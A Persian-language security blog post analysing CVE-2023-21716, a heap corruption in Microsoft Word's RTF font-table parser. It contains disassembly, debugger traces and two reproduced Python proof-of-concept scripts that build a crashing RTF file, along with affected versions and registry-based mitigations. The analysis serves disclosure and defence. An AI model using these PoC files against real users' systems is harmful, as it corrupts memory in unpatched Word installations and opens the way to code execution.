یه آسیب پذیری بحرانی با شناسه CVE-2023-21716 در مایکروسافت Word کشف شده بود که امکان اجرای کد رو از راه دور به مهاجم میداد.
این آسیب پذیری که دارای شدت بحرانی و امتیاز 9.8 هستش در بروزرسانی ماه فوریه (اینجا بررسیش کردیم) ، بهمن 1401، اصلاح شده . آسیب پذیری برای اکسپلویت کردن پیچیدگی کمی داره و نیاز به دسترسی با امتیاز بالا و تعامل کاربر هم نداره.
آسیب پذیری توسط محقق امنیتی Joshua Drake در فایل wwlib.dll آفیس کشف و به مایکروسافت گزارش شده.
آسیب پذیری با باز کردن فایل مخرب RTF قابل اکسپلویت هستش. البته مایکروسافت گفته که نیاز به باز کردن هم نیست و از طریق Preview Pane هم قابل اکسپلویت کردن هستش. مهاجم میتونه با امتیاز کاربری که فایل RTF باز میکنه، کد دلخواه روی سیستم اجرا کنه.
بررسی آسیب پذیری و PoC :
آسیب پذیری از نوع خرابی Heap هستش و در پارسر RTF مایکروسافت Word رخ میده. این پارسر وقتی با یه font table (fonttbl) ، با تعداد زیادی فونت (\f###) روبرو میشه،رخ میده. ID فونت ، عدد بعد از (\f) ، توسط کد زیر پردازش میشه:
1 2 3 4 5 |
0d6cf0b6 0fbf0e movsx ecx,word ptr [esi] ; load base idx 0d6cf0b9 0fbf5602 movsx edx,word ptr [esi+2] ; load font idx 0d6cf0bd 8d1451 lea edx,[ecx+edx*2] ; multiply by ~3 0d6cf0c0 668b08 mov cx,word ptr [eax] ; load the codepage value 0d6cf0c3 66894c5604 mov word ptr [esi+edx*2+4],cx ; write the code page |
همونطور که میبینید مقدار font ID توسط دستور movsx در 0xd6cf0c3 لوود میشه. دستور MOVSX وقتی بکار میره که مقدار حافظه مبدا کوچکتر از مقصد باشه. یعنی مقدار مبدا مثلا 8 بیت باشه و مقدار مقصد 16 بیتی باشه. در این صورت باید مقدار مبدا رو هم تبدیل به 16 کنیم که از این دستور استفاده کنیم. این دستور روی داده های علامت دار مورد استفاده قرار میگیره و برای اینکه تغییری در بیت علامت رخ نده، جاهای خالی رو با بیت علامت پر میکنه. مثلا اگه ما مقدار دسیمال 10 رو داشته باشیم، مقدار باینری اون 00001010 هستش. حالا بخواییم این به 16 بیت گسترش بدیم تبدیل به 0000000000001010 میشه. اما اگه عددمون منفی باشه مثلا مقدار -15 باشه، نمایش 10 بیتی اون بصورت 1111110001 هستش، اگه این تبدیل به 16 بیتی کنیم ، مقدارش 1111111111110001 میشه.
در مثال خودمون MOVSX باعث میشه مقدار بیت های با ارزش EDX با FFFF پر بشن. در زیر بخشی از رفتار دیباگر رو برای این موضوع مشاهده میکنید :
1 2 3 4 5 6 7 8 9 10 11 12 13 |
*** edx will become: 0x17fc8 (from 0x7fec+0x7fee*2) *** edx will become: 0x17fc9 (from 0x7fed+0x7fee*2) *** edx will become: 0x17fde (from 0x7fee+0x7ff8*2) *** edx will become: 0x17fdf (from 0x7fef+0x7ff8*2) *** edx will become: 0x17fe0 (from 0x7ff0+0x7ff8*2) *** edx will become: 0x17fe1 (from 0x7ff1+0x7ff8*2) *** edx will become: 0x17fe2 (from 0x7ff2+0x7ff8*2) *** edx will become: 0x17fe3 (from 0x7ff3+0x7ff8*2) *** edx will become: 0x17fe4 (from 0x7ff4+0x7ff8*2) *** edx will become: 0x17fe5 (from 0x7ff5+0x7ff8*2) *** edx will become: 0x17fe6 (from 0x7ff6+0x7ff8*2) *** edx will become: 0x17fe7 (from 0x7ff7+0x7ff8*2) *** edx will become: 0xffff7ffc (from 0x7ff8+0xffff8002*2) |
با این اوصاف ، دستور نوشتن مموری در 0xd6cf0c3 با نوشتن font code page با مقدار منفی مموری در ESI باعث خرابی هیپ میشه. این out-of-bounds memory write در دیباگر به این صورت اتفاق می افته :
1 2 3 4 5 6 7 8 9 10 11 12 13 |
*** writing 0x4e4 to 0xd35ddb4 [0xd32de20+0x17fc8*2+4] *** writing 0x4e4 to 0xd35ddb6 [0xd32de20+0x17fc9*2+4] *** writing 0x4e4 to 0xd35dde0 [0xd32de20+0x17fde*2+4] *** writing 0x4e4 to 0xd35dde2 [0xd32de20+0x17fdf*2+4] *** writing 0x4e4 to 0xd35dde4 [0xd32de20+0x17fe0*2+4] *** writing 0x4e4 to 0xd35dde6 [0xd32de20+0x17fe1*2+4] *** writing 0x4e4 to 0xd35dde8 [0xd32de20+0x17fe2*2+4] *** writing 0x4e4 to 0xd35ddea [0xd32de20+0x17fe3*2+4] *** writing 0x4e4 to 0xd35ddec [0xd32de20+0x17fe4*2+4] *** writing 0x4e4 to 0xd35ddee [0xd32de20+0x17fe5*2+4] *** writing 0x4e4 to 0xd35ddf0 [0xd32de20+0x17fe6*2+4] *** writing 0x4e4 to 0xd35ddf2 [0xd32de20+0x17fe7*2+4] *** writing 0x4e4 to 0xd31de1c [0xd32de20+0xffff7ffc*2+4] |
بعد از این خرابی، یسری پردازش دیگه انجام میشه که مهاجم میتونه با ایجاد یه heap layout کد دلخواه رو اجرا کنه.
کد PoC زیر این خرابی هیپ رو نشون میده :
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 |
#!/usr/bin/python # # PoC for: # Microsoft Word RTF Font Table Heap Corruption Vulnerability # # by Joshua J. Drake (@jduck) # import sys # allow overriding the number of fonts num = 32761 if len(sys.argv) > 1: num = int(sys.argv[1]) f = open("tezt.rtf", "wb") f.write("{\\rtf1{\n{\\fonttbl") for i in range(num): f.write("{\\f%dA;}\n" % i) f.write("}\n") f.write("{\\rtlch it didn't crash?? no calc?! BOO!!!}\n") f.write("}}\n") f.close() |
نتیجه اجرای PoC بالا :
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 |
Critical error detected c0000374 (3ba8.21f4): WOW64 breakpoint - code 4000001f (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. ntdll_77a40000!RtlReportCriticalFailure+0x4b: 77b27012 cc int 3 0:000:x86> kv # ChildEBP RetAddr Args to Child 00 008f3834 77b30114 00000001 77b63990 77b2e009 ntdll_77a40000!RtlReportCriticalFailure+0x4b (FPO: [Non-Fpo]) 01 008f3840 77b2e009 70dcf286 00000000 1ff78c20 ntdll_77a40000!RtlpReportHeapFailure+0x2f (FPO: [0,0,4]) 02 008f3870 77b36480 00000003 00a50000 1ff78c20 ntdll_77a40000!RtlpHpHeapHandleError+0x89 (FPO: [Non-Fpo]) 03 008f3888 77b2dd17 1ff78c20 0000000a 00000000 ntdll_77a40000!RtlpLogHeapFailure+0x43 (FPO: [Non-Fpo]) 04 008f38ec 77a83f8d 00a50258 70dcf0be 1ff78c20 ntdll_77a40000!RtlpAnalyzeHeapFailure+0x281 (FPO: [Non-Fpo]) 05 008f3a48 77ac7b9d 1ff78c20 1ff78c28 1ff78c28 ntdll_77a40000!RtlpFreeHeap+0x24d (FPO: [Non-Fpo]) 06 008f3aa4 77a83ce6 00000000 00000000 00000000 ntdll_77a40000!RtlpFreeHeapInternal+0x783 (FPO: [Non-Fpo]) 07 008f3ac4 05343c06 00a50000 00000000 1ff78c28 ntdll_77a40000!RtlFreeHeap+0x46 (FPO: [Non-Fpo]) 08 008f3adc 06e6e330 1ff78c28 06c8dc6d 08a11040 mso20win32client!Mso::Memory::Free+0x47 (FPO: [Non-Fpo]) 09 008f3b0c 0430b5af 08a1104c 08a11040 08a11044 mso!MsoFreePpv+0x84 (FPO: [Non-Fpo]) 0a 008f3b28 0430bed0 008f9f0c 008f586c ffffffff wwlib!FreeHribl+0x8c (FPO: [Non-Fpo]) 0b 008f3b70 033be323 40280000 00200002 1a772b98 wwlib!PdodCreateRtf+0x243 (FPO: [6,13,4]) 0c 008f52bc 02e465db 04012000 20280000 00200002 wwlib!``Osf::SimpleFlight::Details::SetupFlight_String'::`3'::<lambda_1>::operator()'::`2'::`dynamic atexit destructor for 'scopes''+0x1e0966 0d 008f5600 03031155 00000000 ffffffff 00000000 wwlib!PdodCreatePfnCore+0x321 (FPO: [Non-Fpo]) 0e 008f5680 0301583a 00000000 ffffffff 00000000 wwlib!PdodCreatePfnBPPaapWithEdpi+0x75 (FPO: [18,3,4]) 0f 008f8c4c 030175d4 04012000 00000000 00000002 wwlib!PdodOpenFnmCore2+0xf3b (FPO: [Non-Fpo]) 10 008f8d14 03c43d9b 04012000 00000000 00000002 wwlib!PdodOpenFnmCore+0xb9 (FPO: [15,30,0]) 11 008f9e40 03c43a92 00000000 00000000 00000002 wwlib!FFileOpenXszCore+0x2f6 (FPO: [Non-Fpo]) 12 008f9e7c 0343bd43 00000000 00000000 00000002 wwlib!FFileOpenXstzCore+0x3d (FPO: [6,4,0]) 13 008fb31c 02d17666 00000001 00000000 02d17609 wwlib!``Osf::SimpleFlight::Details::SetupFlight_String'::`3'::<lambda_1>::operator()'::`2'::`dynamic atexit destructor for 'scopes''+0x271a8e 14 008fb554 02c594f5 71fc93df 7625f550 0000000a wwlib!Boot::IfrParseCommandLine2+0x5d (FPO: [Non-Fpo]) 15 008fb5c8 02c59317 008fb5f8 02c50000 02c58ff4 wwlib!Boot::FRun+0xb4 (FPO: [Non-Fpo]) 16 008ff684 02c59058 96c6d88c 000800e4 71fcd0a7 wwlib!FWordBoot+0x5a (FPO: [Non-Fpo]) 17 008ff6b8 00dd1917 00dd0000 00000000 0000000a wwlib!FMain+0x64 (FPO: [Non-Fpo]) 18 008ff908 00dd114a 00dd0000 00000000 00a54944 winword!WinMain+0x146 (FPO: [Non-Fpo]) 19 008ff954 7625fa29 0069a000 7625fa10 008ff9c0 winword!std::_Deallocate<8,0>+0x1e3 (FPO: [Non-Fpo]) 1a 008ff964 77aa7bbe 0069a000 70dc3336 00000000 KERNEL32!BaseThreadInitThunk+0x19 (FPO: [Non-Fpo]) 1b 008ff9c0 77aa7b8e ffffffff 77ac8d0f 00000000 ntdll_77a40000!__RtlUserThreadStart+0x2f (FPO: [SEH]) 1c 008ff9d0 00000000 00dd1000 0069a000 00000000 ntdll_77a40000!_RtlUserThreadStart+0x1b (FPO: [Non-Fpo]) |
همچنین میشه با Page Heap این مورد رو تایید کرد:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 |
(afe8.9a5c): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. wwlib!FSearchFtcmap+0x150: 0dc1f0c3 66894c5604 mov word ptr [esi+edx*2+4],cx ds:002b:1ebf2fec=???? 0:000:x86> kv # ChildEBP RetAddr Args to Child 00 0135135c 0dc0fa17 013513ec 00000001 013513d8 wwlib!FSearchFtcmap+0x150 (FPO: [Non-Fpo]) 01 01353828 0dc0ddb5 ddc5a2cb 0b3d3028 000ad400 wwlib!RtfInRare+0x1845 (FPO: [Non-Fpo]) 02 01353c5c 0ef5c473 00000200 0b3d3028 66565a58 wwlib!CchRtfInCore+0x28df (FPO: [Non-Fpo]) 03 01353eac 0ef5be04 0b3d302c 0135a294 01355bf4 wwlib!RtfGetChars+0x183 (FPO: [Non-Fpo]) 04 01353ef8 0e00e323 40280000 00200002 45646f10 wwlib!PdodCreateRtf+0x177 (FPO: [6,13,4]) 05 01355644 0da965db 04012000 20280000 00200002 wwlib!``Osf::SimpleFlight::Details::SetupFlight_String'::`3'::<lambda_1>::operator()'::`2'::`dynamic atexit destructor for 'scopes''+0x1e0966 06 01355988 0dc81155 00000000 ffffffff 00000000 wwlib!PdodCreatePfnCore+0x321 (FPO: [Non-Fpo]) 07 01355a08 0dc6583a 00000000 ffffffff 00000000 wwlib!PdodCreatePfnBPPaapWithEdpi+0x75 (FPO: [18,3,4]) 08 01358fd4 0dc675d4 04012000 00000000 00000002 wwlib!PdodOpenFnmCore2+0xf3b (FPO: [Non-Fpo]) 09 0135909c 0e893d9b 04012000 00000000 00000002 wwlib!PdodOpenFnmCore+0xb9 (FPO: [15,30,0]) 0a 0135a1c8 0e893a92 00000000 00000000 00000002 wwlib!FFileOpenXszCore+0x2f6 (FPO: [Non-Fpo]) 0b 0135a204 0e08bd43 00000000 00000000 00000002 wwlib!FFileOpenXstzCore+0x3d (FPO: [6,4,0]) 0c 0135b6a4 0d967666 00000001 00000000 0d967609 wwlib!``Osf::SimpleFlight::Details::SetupFlight_String'::`3'::<lambda_1>::operator()'::`2'::`dynamic atexit destructor for 'scopes''+0x271a8e 0d 0135b8dc 0d8a94f5 ddc527df 7625f550 0000000a wwlib!Boot::IfrParseCommandLine2+0x5d (FPO: [Non-Fpo]) 0e 0135b954 0d8a9317 0135b984 0d8a0000 0d8a8ff4 wwlib!Boot::FRun+0xb4 (FPO: [Non-Fpo]) 0f 0135fa10 0d8a9058 cbd5c9e4 00080138 ddc564d3 wwlib!FWordBoot+0x5a (FPO: [Non-Fpo]) 10 0135fa44 00dd1917 00dd0000 00000000 0000000a wwlib!FMain+0x64 (FPO: [Non-Fpo]) 11 0135fc94 00dd114a 00dd0000 00000000 05e18ff4 winword!WinMain+0x146 (FPO: [Non-Fpo]) 12 0135fce0 7625fa29 011cf000 7625fa10 0135fd4c winword!std::_Deallocate<8,0>+0x1e3 (FPO: [Non-Fpo]) 13 0135fcf0 77aa7bbe 011cf000 96082e8a 00000000 KERNEL32!BaseThreadInitThunk+0x19 (FPO: [Non-Fpo]) 14 0135fd4c 77aa7b8e ffffffff 77ac8d34 00000000 ntdll_77a40000!__RtlUserThreadStart+0x2f (FPO: [SEH]) 15 0135fd5c 00000000 00dd1000 011cf000 00000000 ntdll_77a40000!_RtlUserThreadStart+0x1b (FPO: [Non-Fpo]) |
البته محقق با بررسی بیشتر یسری موارد غیرضروری رو پاک کرده و یه PoC دیگه هم منتشر کرده :
1 |
open("t3zt.rtf","wb").write(("{\\rtf1{\n{\\fonttbl" + "".join([ ("{\\f%dA;}\n" % i) for i in range(0,32761) ]) + "}\n{\\rtlch no crash??}\n}}\n").encode('utf-8')) |
نسخه های تحت تاثیر این آسیب پذیری :
Microsoft Word 2013 RT Service Pack 1
Microsoft Word 2013 Service Pack 1
Microsoft SharePoint Foundation 2013 Service Pack 1
Microsoft Office Web Apps Server 2013 Service Pack 1
Microsoft Word 2016
Microsoft SharePoint Server 2019
Microsoft SharePoint Enterprise Server 2013 Service Pack 1
Microsoft SharePoint Enterprise Server 2016
Microsoft Office 2019 for Mac
Microsoft Office Online Server
SharePoint Server Subscription Edition Language Pack
Microsoft 365 Apps for Enterprise
Microsoft Office LTSC 2021
Microsoft SharePoint Server Subscription Edition
Microsoft Office LTSC for Mac 2021
برای اصلاح آسیب پذیری چند تا روش هستش :
روش اول : اعمال بروزرسانی فوریه مایکروسافت (بهترین روش)
روش دوم: باز کردن فایلهای RTF ارسالی از منابع نامعتبر با Microsoft Outlook
روش سوم: خوندن ایمیلها در حالت plain text (آموزش تنظیم Outlook برای خوندن ایمیلها در حالت Plain text) (نکته در این حالت ایمیلهارو انگاری در Notepad باز میکنید منظور تصویر و … نداره و ممکنه بهم بریزه)
روش چهارم: استفاده از Microsoft Office File Block . این روش هم چند تا نکته داره: یکی اینکه چون با رجیستری اعمال میشه ، اگه جایی اشتباه کنید باید دوباره ویندوز بزنید. نکته بعدی هم اینکه باید یدونه exempt directory طبق این راهنما ایجاد کنید وگرنه نمیتونید داکیومنتهای ذخیره شده در فرمت RTF رو باز کنید.
برای اینکه روش چهار رو اعمال کنید، ابتدا regedit.exe در حالت Administrator اجرا کنید و بعدش بسته به نسخه آفیسی که دارید به مسیر های زیر برید :
1 2 3 4 5 6 7 8 9 10 11 |
#Office 2013 [HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Word\Security\FileBlock] #Office 2016 [HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Security\FileBlock] #Office 2019 [HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Security\FileBlock] #Office 2021 [HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Security\FileBlock] |
در این مسیرهای بالا ، مقادیر زیر رو اعمال کنید:
1 2 |
RtfFiles DWORD=2 OpenInProtectedView DWORD=0 |
اگه خواستین تنظیمات رو برگردید، مقادیر بالا رو بصورت زیر تغییر بدید:
1 2 |
RtfFiles DWORD=0 OpenInProtectedView DWORD=0 |